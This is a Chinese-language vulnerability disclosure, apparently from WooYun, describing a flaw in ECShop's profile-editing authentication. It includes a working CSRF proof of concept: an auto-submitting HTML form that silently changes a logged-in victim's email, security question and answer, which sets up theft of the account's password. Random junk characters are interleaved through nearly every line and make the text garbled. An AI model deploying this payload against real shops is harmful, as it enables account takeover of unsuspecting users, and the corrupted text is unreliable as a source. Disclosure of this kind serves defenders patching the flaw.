简要描述:
7 T d& u3 B2 [8 h% J1 f) V1 Z4 aecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
/ x9 I+ C) V% g" J0 X. N# h* {# c% R: i$ [. X
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
8 H; {9 C8 @, c2 t6 D4 K1 R
; Q8 ^ I, ]7 ^5 {/ J, a2 S详细说明:
3 |, U/ C1 A* Z" T x/ |# @利用csrf和xss可以突破官方所说的“障碍”
# d5 t9 b& a4 S vxss版本已经有人说明, L8 r. W0 c9 d, E" P% v/ A
这里给出csrf版本
3 _( t5 h: Y! q
3 k, O% o1 L6 F) p/ V( I* t漏洞证明:0 u; ]0 o* w& N8 t0 w1 A' z
<html>
4 D4 Z2 E) g; g7 }<body>4 g' h5 f h$ ?9 ?" J; T6 Y
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">, k5 z$ J% t5 V4 c3 r, ]% E
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">) E7 o' P2 H# w _# H$ D
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
7 W" }6 ]9 t1 y3 P<INPUT TYPE="text" NAME="sel_question" value="ecshop">: t5 f H2 W) H
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">7 K0 o/ p4 h$ w4 A) L& d( P
</body>
5 k3 s2 R! X5 C* U& o$ o+ F) F1 Y9 ^<script>
, c9 h/ D4 u5 W/ Cdocument.forms[0].submit();
% C: Q0 d& t( S) x" W( e1 S</script>
' v0 \. [9 q8 M& A</html>4 M/ y7 A* H% E6 `# I
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失3 `$ E, R/ J& l3 A5 d+ i) q
2 |, g1 u3 l" n& p
|